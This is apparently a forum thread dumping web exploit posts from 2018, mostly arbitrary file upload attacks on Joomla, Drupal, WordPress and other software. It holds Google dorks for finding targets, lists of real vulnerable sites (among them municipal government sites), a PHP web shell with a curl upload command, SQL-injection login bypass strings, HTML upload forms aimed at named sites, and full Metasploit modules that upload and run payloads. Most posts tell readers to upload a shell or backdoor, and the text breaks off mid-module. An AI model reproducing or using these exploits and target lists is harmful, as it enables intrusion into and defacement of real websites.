hotelcorona.fg.it/joomla/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah hotelruas.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"%20halah&lang=en osteriasantatrinita.it/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../"+halah insentis.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah ristorantepizzeriasanmartino.net/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en wukrohr.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah hubico.ch/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en vr-lagerhaus-obb-so.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en mercuriuscatering.nl/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en rwg-essenbach.de/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22%20halah&lang=en liaisonsante.com/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../%22+halah + Proof of Concept for the Vulnerability : archive.is/rjRKz ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team # Original Reference Link => cyberizm.org/cyberizm-joomla-codextrous-com-b2jcontact-shell-upload-exploit.html #################################################################################################
  9. # Exploit Title : Drupal PaisDigital ArgentinaGov Municipality ContactForm Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos # Date : 01/06/2018 # Vendor Homepage : argentina.gob.ar/paisdigital # Tested On : Windows # Exploit Risk : High # CWE-264 - [ Permissions, Privileges, and Access Controls ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060021 ################################################################################################# # Google Dork 1 : inurl:''/?q=contacto'' site:gob.ar # Google Dork 2 : intext:''Los archivos deben ser menores que 2 MB.'' site:gob.ar # Google Dork 3 : intext:''Tipos de archivo permitidos: gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx.'' site:gob.ar # Exploit : /?q=contacto # Path : /sites/default/files/webform/.... # Notes => Allowed File Extensions : gif jpg jpeg png txt rtf html pdf doc docx odt ppt pptx odp xls xlsx. ################################################################################################# # Target IP Address => 186.33.254.182 # Example Vulnerable Sites => municipalidaddeaguascalientes.gob.ar/?q=contacto [ Proof of Concept ] => archive.is/d8GHu => archive.is/QTpnS pellegrini.gov.ar magdalena.gob.ar marull.gob.ar pampablanca.gob.ar municipalidaddeabrapampa.gob.ar saladillo.gob.ar lasflores.gob.ar municipalidaddearrayanal.gob.ar palmasola.gob.ar frailepintado.gob.ar rinconada.gob.ar montedelosgauchos.gob.ar trescruces.gob.ar generallavalle.gob.ar vinalito.gob.ar puestoviejo.gob.ar balcarce.gob.ar ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  10. # Exploit Title : Drupal 7 jQuery ItalianGov Fi.it Scrivi Al Comune Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/06/2018 # Vendor Homepage : regione.toscana.it - jquery.com # Tested On : Windows # Version : 7 # Category : WebApps # Exploit Risk : Medium # CWE : CWE-287 [ Improper Authentication ] + CWE-284 [ Improper Access Control ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060240 ################################################################################################# # Google Dorks : intext:''Scrivi al Comune'' site:fi.it Il testo del tuo messaggio * site:fi.it # Exploits : /scrivi-al-comune /scrivi-al-comune-0 /segnalazioni-e-reclami-0 /scrivi-al-sindaco-0 /node/19 # Path : /sites/www.comune.DOMAINADDRESS.fi.it/files/webform/..... # Note => Allowed File Extensions : gif jpg png tif txt rtf odf pdf doc docx xls xlsx. # Don't forget to put www. before comune. on the URL Address bar. ################################################################################################# # Example Vulnerable Sites and Target IP => 159.213.236.225 [ Proof of Concept for Vulnerability and Exploit ] => archive.is/zUN5z - archive.is/3IMxH www.comune.vicchio.fi.it/segnalazioni-e-reclami-0 www.comunebarberino.it/scrivi-al-comune www.comune.borgo-san-lorenzo.fi.it/scrivi-al-comune-0 www.comune.bagno-a-ripoli.fi.it/scrivi-al-sindaco-0 www.comune.rignano-sullarno.fi.it/scrivi-al-comune www.comune.pontassieve.fi.it/scrivi-al-comune-0 www.comune.marradi.fi.it/scrivi-al-comune www.comune.dicomano.fi.it/scrivi-al-comune-0 www.comune.reggello.fi.it/scrivi-al-comune-0 www.comune.palazzuolo-sul-senio.fi.it/scrivi-al-comune www.comune.scarperiaesanpiero.fi.it/scrivi-al-comune www.comune.provagliodiseo.bs.it/node/19 www.comune.terni.it/scrivi-al-comune ################################################################################################ Reference Topic Link [ It belongs to me ] => cyberizm.org/cyberizm-drupal-7-jquery-italia-fi-it-scrivi-al-comune-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  11. ################################################################################################# # Exploit Title : WordPress DrcSystems EthicSolutions Jssor-Slider Library Plugin Arbitrary File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 19/06/2018 # Vendor Homepage : jssor.com - drcsystems.com - ethicsolutions.com - wordpress.org/plugins/jssor-slider/ # Tested On : Windows # Category : WebApps # Exploit Risk : Medium # CWE : CWE-284 [ Improper Access Control ] - CWE-862 [ Missing Authorization ] # CXSecurity : cxsecurity.com/ascii/WLB-2018060226 ##################################################################################################### Description : “Jssor Slider by jssor.com” is open source software. Jssor Slider is professional, light weight and easy to use slideshow/slider/gallery/carousel/banner, it is optimized for mobile device with tons of unique features. # Key Features : Touch Swipe - 200+ Slideshow Transitions - Layer Animation - Fast Loading, load slider html code from disk cache directly - High Performance Light Weight - Easy to Use - Repeated Layer Animation - Image Layer - Text/Html Layer - Panel Layer - Nested Layer - Layer Blending - Clip Mask Multiplex Transition - z-index Animation - Timeline Break - Dozens of bullet/arrow/thumbnail skins ##################################################################################################### Affected Jssor Slider Plugin Code : When the plugin is active the function register_ajax_calls() in the file /lib/jssor-slider-class.php is run: That gives anyone access to two AJAX functions that are only intended to be accessible to those logged in as Administrators. The upload_library() function accessible through that handles uploading a file through /lib/upload.php. That file also doesn’t do any checks as to who is making the request and does not restrict what type of files can be uploaded. It is also possible to exploit this by sending a request directly to the file /lib/upload.php, as long as the undefined constant in that isn’t treated as an error. The following proof of concept will upload the selected file to the directory /wp-content/jssor-slider/jssor-uploads/. Make sure to replace “[path to WordPress]” with the location of WordPress. public function register_ajax_calls() { if ( isset( $_REQUEST['action'] ) ) { switch ( $_REQUEST['action'] ) { case 'add_new_slider_library' : add_action( 'admin_init', 'jssor_slider_library' ); function jssor_slider_library() { include_once JSSOR_SLIDER_PATH . '/lib/add-new-slider-class.php'; } break; case 'upload_library' : add_action( 'admin_init', 'upload_library' ); function upload_library() { include_once JSSOR_SLIDER_PATH . '/lib/upload.php'; } break; } } } ##################################################################################################### # Google Dorks : inurl:''/wp-content/jssor-slider/jssor-uploads/'' intext:''Managed by Web development company Ethic Solutions'' intext:''Todos los derechos reservados © Ecuaauto - Distribuidor autorizado Chevrolet Ecuador'' intext:''Website Developed by DRC Systems'' ##################################################################################################### # PoC : /wp-admin/admin-ajax.php?param=upload_slide&action=upload_library # Error : {"jsonrpc" : "2.0", "result" : null, "id" : "id"} # Exploit Code : <html> <body> <form action="http://[PATH]/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library" method="POST" enctype="multipart/form-data" > <input type="file" name="file" /> <input type="submit" value="Submit" /> </form> </body> </html # Uploaded File Path : /wp-content/jssor-slider/jssor-uploads/..... # Allowed File Extensions : With the exception of php and asp. [ Not Allowed ] But other files extensions are allowed. For example html and txt and etcetra.... # Usage : Use with XAMPP Control Panel and with your Localhost [ 127.0.0.1] localhost/jssorsliderexploiter.html ################################################################################################# # Example All Vulnerable Sites => treeline.co/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sss2003.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library lr-parts.com.ua/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library eduardobermejo.com/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library anro.net.pl/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library esplural.com/ecuaauto/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library sardardham.org/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library butterbean.ph/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library canoes.fr/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library betterimpact.ca/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library klshospital.co.in/wp-admin/admin-ajax.php?param=upload_slide&action=upload_library ############################################################################ Reference [ Me ] : cyberizm.org/cyberizm-wordpress-drcsystems-ethicsolutions-jssorslider-exploit.html ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  12. vvvvvvvv *************************************************** # Exploit Title: Đăng nhập Arbitrary File Upload # Google Dork: intext:Đăng nhập. Xác nhận. inurl:/xadmin # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 12/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /editor/fileman/aklsdjfklsdjflksdkl.html [+] Upload your backdoor with bypass ext *************************************************** [+] Demo Site [+] https://thietbibepkanzler.vn/editor/fileman/aklsdjfklsdjflksdkl.html [+] http://kientrucla.com/editor/fileman/aklsdjfklsdjflksdkl.html [+] https://www.songhonghanoi.com/editor/fileman/aklsdjfklsdjflksdkl.html *************************************************** Thanks To Indonesia To World Team
  13. Title: jQuery-File-Upload <= v9.22.0 unauthenticated arbitrary file upload vulnerability Author: Larry W. Cashdollar, @_larry0 Date: 2018-10-09 CVE-ID:[CVE-none] Download Site: https://github.com/blueimp/jQuery-File-Upload/releases Vendor: https://github.com/blueimp Vendor Notified: 2018-10-09 Vendor Contact: Advisory: http://www.vapidlabs.com/advisory.php?v=204 Description: File Upload widget with multiple file selection, drag&drop support, progress bar, validation and preview images, audio and video for jQuery. Supports cross-domain, chunked and resumable file uploads. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads. Vulnerability: The code in https://github.com/blueimp/jQuery-File-Upload/blob/master/server/php/UploadHandler.php doesn't require any validation to upload files to the server. It also doesn't exclude file types. This allows for remote code execution. This has been actively exploited in the wild for over a year. Exploit Code: $ curl -F "files=@shell.php" http://localhost/jQuery-File-Upload-9.22.0/server/php/index.php Where shell.php is: <?php $cmd=$_GET['cmd']; system($cmd);?>
  14. # Exploit Title: Powered By CF Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:2018-10-11 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org # MY page Exploit: https://www.exploit-db.com/author/?a=2243 |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi http://www.exploit4arab.org/exploits/2114
  15. http://www.exploit4arab.org/exploits/2087 اولین ابزار ثبت شدمون در این قسمت
  16. *************************************************** # Exploit Title: Dipnot Yönetim Paneli Arbitrary File Upload # Google Dork: inurl:/dipnotpanel/js/tinymce/plugins/fileman # Exploit: /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php # Date: 03/10/2018 # Author: 0N3R1D3R # Team: Indonesia To World Team # Tested on: Windows 10 x64 *************************************************** [+] Search the dork in Google [+] Exploit the site with /dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] Upload your file with csrf, post file files[] [+] Upload shell must with bypass ext [+] Access the site with /dipnotpanel/js/tinymce/plugins/fileman/Uploads/file.jpg *************************************************** [+] Demo Site [+] http://www.mikronmadencilik.com/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.arinna.com.tr/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php [+] http://www.aegee-eskisehir.org/dipnotpanel/js/tinymce/plugins/fileman/php/upload.php *************************************************** Thanks To Indonesia To World Team
  17. ################################################################################################# # Exploit Title : Joomla Com_BibleStudy Proclaim MediaFileForm Remote File Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 28/09/2018 # Vendor Homepage : joomlabiblestudy.org ~ extensions.joomla.org/extension/proclaim/ # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CVE: CVE-2018-7316 # CWE : CWE-264 [ Permissions, Privileges, and Access Controls ] ################################################################################################# # Google Dork : inurl:''/index.php?option=com_biblestudy'' # Exploit : TARGET/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 # Note : Go to the '' Media Files '' Category. Choose your File and Upload it. # Directory File Path : TARGET/images/biblestudy/media/.... ################################################################################################# # Example Vulnerable Sites => kalamekhuda.com/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 => [ Proof of Concept for Vulnerability and Proof of Mirror ] => archive.is/nfskL => archive.is/5NaKe hereatcalvary.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 [ Proof of Concept ] => archive.is/oEPx3 cclivinghope.org/index.php?option=com_biblestudy&view=mediafileform&layout=edit&id=1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################
  18. ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. by Rednofozi anonysec hackers iran .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' ==================================================================================== # Exploit Title: Image Hosting script admin page bypass vulnerability / upload shell # Exploit Author: Rednofozi # Date:26-09-2018 # Email: Rednofozi@yahoo.com # Vendor Homepage: www.codefuture.co.uk # OUR SITE : https://anonysec.org |==================================================================================== # {INFO} # admin bypass Vulnerability |==================================================================================== # {DORK} # intext:"Powered By CF Image Hosting script |==================================================================================== # {POC} # admin page: # site.com/admin # exploit: # Username: '=''or' # password: '=''or' # # zone-h test hacked http://www.zone-h.org/mirror/id/31702111 |==================================================================================== # {DEMO} # 01: http://www.irtci.ir/pic/admin.php # 02: hhttp://image4web.net/admin/ # 03: https://admin.serconi.es/admin # 04: and upload shell # 05: # 06: # 07: # 08: # 09: # 10: |==================================================================================== # {TNX For} # >>> Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow # >>> Discovered By :Rednofozi |==================================================================================== The END ; Good Luck :D:D:D http://www.exploit4arab.org/exploits/2051
  19. **************************************************************** # Exploit Title: Israel site login Bypass and upload your shell # Google Dork:"inurl:/page.asp?NewsID= & /page.asp?PageID= site.il # Date: 22/09/2018 # Author: Rednofozi # Vendor Homepage :http://www.ekdesign.co.il/ # Team: https://anonysec.org # Tested on: Kali Linux and win ***************************************************************| |[+] Exploit : |[+] |[+] Admin panel: [+] Vulnerability [+] http://www.dt-law.co.il/admin/[UPLOAD] [+] www.site.com/modules/admin/[UPLOAD] |--------------------------------------------------------------| |[+] Demo:- |[+]http://testcar.co.il/admin/[UPLOAD] |[+] http://testcar.co.il/admin/upload.asp |[+]http://www.pgs-law.co.il/admin/upload.asp |[+]http://www.dt-law.co.il/admin/upload.asp Bypass and upload your shell , TamperData .. img.jpg.pjpeg << Good luck |--------------------------------------------------------------| **************************************************************** Discovered by : Rednofozi Thanks To: ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/2045
  20. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress RevSlider File Upload and Execute Vulnerability', 'Description' => %q{ This module exploits an arbitrary PHP code upload in the WordPress ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The vulnerability allows for arbitrary file upload and remote code execution. }, 'Author' => [ 'Simo Ben youssef', # Vulnerability discovery 'Tom Sellers <tom[at]fadedcode.net>' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'], ['EDB', '35385'], ['WPVDB', '7954'], ['OSVDB', '115118'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]], 'DisclosureDate' => 'Nov 26 2015', 'DefaultTarget' => 0) ) end def check release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt') check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96') end def exploit php_pagename = rand_text_alpha(4 + rand(4)) + '.php' # Build the zip payload_zip = Rex::Zip::Archive.new # If the filename in the zip is revslider.php it will be automatically # executed but it will break the plugin and sometimes WordPress payload_zip.add_file('revslider/' + php_pagename, payload.encoded) # Build the POST body data = Rex::MIME::Message.new data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"') data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"') data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"") post_data = data.to_s res = send_request_cgi( 'uri' => wordpress_url_admin_ajax, 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data ) if res if res.code == 200 && res.body =~ /Update in progress/ # The payload itself almost never deleted, try anyway register_files_for_cleanup(php_pagename) # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) print_good("#{peer} - Our payload is at: #{final_uri}") print_status("#{peer} - Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 ) elsif res.code == 200 && res.body =~ /^0$/ # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated") else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") end else fail_with(Failure::Unknown, 'ERROR') end end end
  21. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Novell ZENworks Configuration Management Arbitrary File Upload', 'Description' => %q{ This module exploits a file upload vulnerability in Novell ZENworks Configuration Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in the UploadServlet which accepts unauthenticated file uploads and does not check the "uid" parameter for directory traversal characters. This allows an attacker to write anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack. This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a Metasploit exploit, but it abuses a different parameter of the same servlet. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-0779'], ['OSVDB', '120382'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/zenworks_zcm_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2015/Apr/21'] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => true, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'Novell ZCM < v11.3.2 - Universal Java', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 7 2015')) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Use SSL', true]), OptString.new('TARGETURI', [true, 'The base path to ZCM / ZENworks Suite', '/zenworks/']), OptString.new('TOMCAT_PATH', [false, 'The Tomcat webapps traversal path (from the temp directory)']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'GET' }) if res && res.code == 200 && res.body.to_s =~ /ZENworks File Upload Servlet/ return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def upload_war_and_exec(tomcat_path) app_base = rand_text_alphanumeric(4 + rand(32 - 4)) war_payload = payload.encoded_war({ :app_name => app_base }).to_s print_status("#{peer} - Uploading WAR file to #{tomcat_path}") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'UploadServlet'), 'method' => 'POST', 'data' => war_payload, 'ctype' => 'application/octet-stream', 'vars_get' => { 'uid' => tomcat_path, 'filename' => "#{app_base}.war" } }) if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful") else print_error("#{peer} - Failed to upload, try again with a different path?") return false end 10.times do Rex.sleep(2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Failure. Unexpected answer break if res.code != 200 # Unless session... keep looping return true if session_created? end false end def exploit tomcat_paths = [] if datastore['TOMCAT_PATH'] tomcat_paths << datastore['TOMCAT_PATH'] end tomcat_paths.concat(['../../../opt/novell/zenworks/share/tomcat/webapps/', '../webapps/']) tomcat_paths.each do |tomcat_path| break if upload_war_and_exec(tomcat_path) end end end
  22. mohammad_ghazei

    Hacking

    ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => "SysAid Help Desk 'rdslogs' Arbitrary File Upload", 'Description' => %q{ This module exploits a file upload vulnerability in SysAid Help Desk v14.3 and v14.4. The vulnerability exists in the RdsLogsEntry servlet which accepts unauthenticated file uploads and handles zip file contents in a insecure way. By combining both weaknesses, a remote attacker can accomplish remote code execution. Note that this will only work if the target is running Java 6 or 7 up to 7u25, as Java 7u40 and above introduces a protection against null byte injection in file names. This module has been tested successfully on version v14.3.12 b22 and v14.4.32 b25 in Linux. In theory this module also works on Windows, but SysAid seems to bundle Java 7u40 and above with the Windows package which prevents the vulnerability from being exploited. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2015-2995' ], [ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/generic/sysaid-14.4-multiple-vulns.txt' ], [ 'URL', 'http://seclists.org/fulldisclosure/2015/Jun/8' ] ], 'DefaultOptions' => { 'WfsDelay' => 30 }, 'Privileged' => false, 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'SysAid Help Desk v14.3 - 14.4 / Java Universal', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 3 2015')) register_options( [ Opt::RPORT(8080), OptInt.new('SLEEP', [true, 'Seconds to sleep while we wait for WAR deployment', 15]), OptString.new('TARGETURI', [true, 'Base path to the SysAid application', '/sysaid/']) ], self.class) end def check servlet_path = 'rdslogs' bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'vars_get' => { 'rdsName' => bogus_file } }) if res && res.code == 200 return Exploit::CheckCode::Detected end end def exploit app_base = rand_text_alphanumeric(4 + rand(32 - 4)) tomcat_path = '../../../../' servlet_path = 'rdslogs' # We need to create the upload directories before our first attempt to upload the WAR. print_status("#{peer} - Creating upload directory") bogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(rand_text_alphanumeric(4 + rand(32 - 4))), 'ctype' => 'application/xml', 'vars_get' => { 'rdsName' => bogus_file } }) war_payload = payload.encoded_war({ :app_name => app_base }).to_s # We have to use the Zlib deflate routine as the Metasploit Zip API seems to fail print_status("#{peer} - Uploading WAR file...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], servlet_path), 'method' => 'POST', 'data' => Zlib::Deflate.deflate(war_payload), 'ctype' => 'application/octet-stream', 'vars_get' => { 'rdsName' => "#{tomcat_path}/tomcat/webapps/#{app_base}.war\x00" } }) # The server either returns a 200 OK when the upload is successful. if res && res.code == 200 print_status("#{peer} - Upload appears to have been successful, waiting #{datastore['SLEEP']} seconds for deployment") register_files_for_cleanup("tomcat/webapps/#{app_base}.war") else fail_with(Failure::Unknown, "#{peer} - WAR upload failed") end 10.times do select(nil, nil, nil, 2) # Now make a request to trigger the newly deployed war print_status("#{peer} - Attempting to launch payload in deployed WAR...") res = send_request_cgi({ 'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), 'method' => 'GET' }) # Failure. The request timed out or the server went away. break if res.nil? # Success! Triggered the payload, should have a shell incoming break if res.code == 200 end end end
  23. ########################################## # Exploit Title : IRan site wordpress Arbitary File Upload # Dork : inurl:/plupload/ -inurl:(php) intitle:index of site:ir # Date : 2018 # Exploit Author: anonysec # Category: Webapps # Language: PHP # Tested on: windows 10 / FireFox #myteam:https://anonysec.org/ Info : ______________________________________________________________________ #view : https://www.ariarockwool.ir/wp-includes/js/ #Test Upload :https://www.ariarockwool.ir/wp-includes/js/plupload/l/media/vendor/plupload/examples/upload.php ______________________________________________________________________ #Tools : <!DOCTYPE html> <html> <body> <form action="https://www.ariarockwool.ir/wp-includes/js/plupload/upload.php" method="post" enctype="multipart/form-data"> <input type="file" name="file" id="file"> <input type="submit" value="Upload" name="submit"> </form> </body> </html> ______________________________________________________________________ # Discovered by : Rednofozi #--tnx to : ReZa CLONER , Moeein Seven. DOCTOR ROBOT .soldier anonymous. milad shadow http://www.exploit4arab.org/exploits/1978
  24. ## # This module requires Metasploit: http://www.metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info( info, 'Name' => 'CMS Bolt File Upload Vulnerability', 'Description' => %q{ Bolt CMS contains a flaw that allows an authenticated remote attacker to execute arbitrary PHP code. This module was tested on version 2.2.4. }, 'License' => MSF_LICENSE, 'Author' => [ 'Tim Coen', # Vulnerability Disclosure 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'References' => [ ['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html'] ], 'DisclosureDate' => 'Aug 17 2015', 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Bolt 2.2.4', {}]], 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The base path to the web application', '/']), OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']), OptString.new('USERNAME', [true, 'The username to authenticate with']), OptString.new('PASSWORD', [true, 'The password to authenticate with']) ], self.class) end def check cookie = bolt_login(username, password) return Exploit::CheckCode::Detected unless cookie res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'bolt'), 'cookie' => cookie ) if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS') return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def fname datastore['FOLDERNAME'] end def bolt_login(user, pass) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login') ) fail_with(Failure::Unreachable, 'No response received from the target.') unless res session_cookie = res.get_cookies vprint_status("#{peer} - Logging in...") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'bolt', 'login'), 'cookie' => session_cookie, 'vars_post' => { 'username' => user, 'password' => pass, 'action' => 'login' } ) return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt') nil end def get_token(cookie, fname) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname), 'cookie' => cookie ) if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" / return Regexp.last_match[1] end nil end def rename_payload(cookie, 